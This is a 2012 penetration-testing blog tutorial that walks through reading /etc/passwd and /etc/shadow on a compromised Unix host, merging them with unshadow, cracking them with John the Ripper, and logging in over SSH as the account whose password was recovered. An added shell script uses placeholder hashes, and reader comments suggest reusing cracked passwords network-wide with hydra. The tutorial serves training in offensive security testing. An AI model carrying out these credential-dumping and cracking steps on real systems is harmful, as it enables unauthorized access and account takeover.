Dumping And Cracking Unix Password Hashes

23 Jul

One of the first post-exploitation activities after compromising a target is to obtain the password hashes so that they can be cracked offline. If we manage to crack them we may be able to escalate our privileges and gain administrative access, especially if the administrator's hash is among those cracked. In this tutorial we will see how to obtain and crack password hashes from a Unix box.

Let's say that we have exploited a vulnerability and gained a remote shell on our target. The next step is to list the directories and files on the remote system with the command ls.

Directories of the remote system


The next step is to read the /etc/passwd file, which lists all the accounts on the remote system. The next image shows the local accounts of the machine we have compromised. Let's analyse the information we can obtain from the first entry, which is root. The fields are separated by colons. The first field is the username. The x in the second field means that the password hash is not kept here but in /etc/shadow (on older systems the hash itself sat in this field, which is why /etc/passwd is world-readable and /etc/shadow is not). The number 0 is the user ID, which for root is always zero, and the next 0 is the group ID. The next field, root, is the GECOS (comment) field, where any extra information about the user would appear (in this case there is none), and the last two fields, /root and /bin/bash, are the user's home directory and login shell.

Reading the /etc/passwd file


Now that we have the list of accounts on the remote system we can save it to a file for later use, which we will call passwords.txt. The next step is to obtain the password hashes. On Unix systems the password hashes are stored in /etc/shadow, which is readable only by root, so the shell we obtained must already be running as root (or an equivalent) for this step to work. We run the command cat /etc/shadow to see them.

Reading the password hashes of the target


We save the hashes as well in a file called shadow.txt and use the well-known password cracker John the Ripper to crack them. In BackTrack John the Ripper is located in the following path: /pentest/passwords/john.

john the ripper directory


From the above image we can see all the files in the john directory. Among them is a utility called unshadow. We run it to merge the passwd and shadow files into the single format john expects: each line carries the username, the hash and the remaining passwd fields, which john's single-crack mode uses to build its first candidate passwords (login name, GECOS name, home directory). So we execute the command ./unshadow /root/Desktop/Cracking/passwords.txt /root/Desktop/Cracking/shadow.txt > /root/Desktop/Cracking/cracked.txt

This command combines the two files we created earlier into a single file called cracked.txt (the name is misleading: it holds the uncracked hashes, and john writes the passwords it recovers to its john.pot file). Now we are ready to crack those hashes with the command ./john /root/Desktop/Cracking/cracked.txt. Run with no options, john tries single-crack mode first, then its default wordlist with mangling rules, then incremental (brute-force) mode. As we can see john cracked these hashes quickly, which it will only do when the passwords are weak (dictionary words or short strings); long random passwords hashed with sha512crypt would take the same run days or never fall. Either way, we now have the usernames and passwords of every account on the target whose hash was cracked.
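The passwd field layout and the unshadow step described above, as an added example that is not part of the original post: the script below constructs small sample passwd and shadow files, reproduces the merge that unshadow performs with awk, and classifies each shadow hash by its $id$ prefix so that locked (* or !) accounts are not handed to the cracker. The account lines and hash strings are constructed placeholders in the right layout, not real hashes, and the function names are assumptions for this example.

```shell
#!/bin/sh
# Added example (not from the original post): re-create what unshadow does
# and classify each shadow hash before handing the result to john.
# All account lines below are CONSTRUCTED; the hash strings are placeholders
# that only mimic the $id$salt$hash layout and do not decode to real passwords.

WORKDIR=$(mktemp -d)
PASSWD_FILE="$WORKDIR/passwd"
SHADOW_FILE="$WORKDIR/shadow"

# passwd: name:x:UID:GID:GECOS:home:shell  (the "x" says "look in /etc/shadow")
cat > "$PASSWD_FILE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
EOF

# shadow: name:hash:lastchange:min:max:warn:inactive:expire:reserved
cat > "$SHADOW_FILE" <<'EOF'
root:$6$r0otSalt$PLACEHOLDERsha512cryptHASHvalue:15544:0:99999:7:::
daemon:*:15544:0:99999:7:::
sys:$1$sysSalt$PLACEHOLDERmd5cryptHASH:15544:0:99999:7:::
alice:!$6$alSalt$PLACEHOLDERlockedHASH:15544:0:99999:7:::
EOF

# Classify a shadow password field the way a cracker would before picking a format.
hash_type() {
  case "$1" in
    '')              echo "empty (no password required!)" ;;
    '*'|'!'|'!!')    echo "locked/no-login" ;;
    '!'*)            echo "locked account ($(hash_type "${1#!}"))" ;;
    '$1$'*)          echo "md5crypt" ;;
    '$5$'*)          echo "sha256crypt" ;;
    '$6$'*)          echo "sha512crypt" ;;
    '$7$'*)          echo "scrypt" ;;
    '$y$'*)          echo "yescrypt" ;;
    '$2a$'*|'$2b$'*|'$2y$'*) echo "bcrypt" ;;
    *)               echo "descrypt-or-unknown" ;;
  esac
}

# Merge like unshadow(8): replace passwd's "x" with the shadow hash, keyed by
# username, keeping the other passwd fields (GECOS, home) that john's
# single-crack mode feeds on. Shadow is read first to build the lookup table.
unshadow_merge() {  # $1 = passwd file, $2 = shadow file
  awk -F: -v OFS=: 'NR==FNR { hash[$1] = $2; next }
                    ($1 in hash) { $2 = hash[$1] } { print }' "$2" "$1"
}

# List only the accounts whose shadow entry holds a hash worth cracking.
crackable_accounts() {  # $1 = shadow file
  while IFS=: read -r user hash _; do
    case "$(hash_type "$hash")" in
      md5crypt|sha256crypt|sha512crypt|scrypt|yescrypt|bcrypt|descrypt-or-unknown)
        echo "$user" ;;
    esac
  done < "$1"
}

echo "== unshadow-style merge (what john would be given) =="
unshadow_merge "$PASSWD_FILE" "$SHADOW_FILE"
echo "== hash type per account =="
while IFS=: read -r user hash _; do
  printf '%-8s %s\n' "$user" "$(hash_type "$hash")"
done < "$SHADOW_FILE"
echo "== accounts worth cracking =="
crackable_accounts "$SHADOW_FILE"
```

Note how daemon (hash `*`) and alice (hash prefixed with `!`) are dropped from the cracking list: john would otherwise spend its time on fields that can never match a password. On a real engagement the same classification tells you which john format (md5crypt, sha512crypt, ...) to expect and therefore how long the run is likely to take.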

Cracked passwords


If we want to see the passwords we cracked, we can use john's --show option, which reads them back from john.pot and prints them next to their usernames. For example ./john --show /root/Desktop/Cracking/cracked.txt

Display all passwords of the target


Now that we have the passwords we can use them to connect remotely to our target. For example, if the target runs an SSH server we can use that service. In this specific example we connect as the user sys, whose password, as we discovered above, is batman. (This works on the lab box because sys has a real hash and a login shell; on a hardened system service accounts like sys normally have a locked hash and a nologin shell, and the interesting logins are the human accounts.)

Connection through SSH



In this article we saw how to obtain and crack the password hashes of a remote system. In penetration testing engagements, if we manage to crack a password hash from the target we have a valid account, which gives us access that survives the original vulnerability being patched, at least until the password is changed. Cracked passwords are also frequently reused on other hosts in the network, so obtaining and cracking the hashes should be one of the first post-exploitation activities for a penetration tester.


Posted by on July 23, 2012 in Post Exploitation



5 responses to "Dumping And Cracking Unix Password Hashes"

  1. Bryan Miller

    July 23, 2012 at 9:30 am

    You forgot to mention that you must be “root” equivalent to dump the /etc/shadow file. If you have that privilege already you don’t really need to dump and crack the passwords.

    • shellnobi

      July 23, 2012 at 4:31 pm

      You still need to crack the passwords, as in many cases, weak password credentials are reused within the network and can assist the penetration tester in pivoting to other machines. If you’re attacking several machines in an internal network and you manage to crack several passwords, you can easily fire up a tool like hydra to quickly attempt a login for a cracked user account across the network.

  2. netbiosX

    July 23, 2012 at 9:54 am

    You are right Bryan! You need to be root in order to read the /etc/shadow. However I will not agree with you that there is no need to dump and crack passwords, because you will need that in order to discover alternative routes for access on the remote machine.

  3. James

    August 3, 2014 at 10:36 pm

    If you already have root access on the target how do you dump its shadow file and passwd file to your attack server so you're able to run John against the two files? Don't you need to copy them to your machine to run John against them?

    • James

      August 3, 2014 at 10:38 pm

      I would assume you need to establish more than an SSH connection to the target to copy files from it back to your attack server. Is that correct?
